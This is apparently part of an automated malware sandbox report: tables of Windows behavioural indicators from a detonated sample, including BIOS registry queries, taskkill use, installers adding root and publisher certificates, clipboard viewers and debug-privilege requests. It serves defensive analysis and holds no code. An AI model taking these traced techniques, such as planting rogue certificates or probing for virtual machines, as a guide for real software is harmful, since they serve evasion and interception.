| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-9L90V.tmp\Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = <certificate blob omitted> | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-9L90V.tmp\Setup.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\11111.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\11111.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3300666.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\4464286.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\KPILVtzG__MhYfUlByzuGiAu.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\cOczhFVnOyKSRsPELdcpkTie.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\hMOkZHYImoDvLaSAXvcVWIzw.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\dKoMKenWr0odB6tjTFVUEYzN.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\UkdBd92nKdEVxt7NH_xJ86WB.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
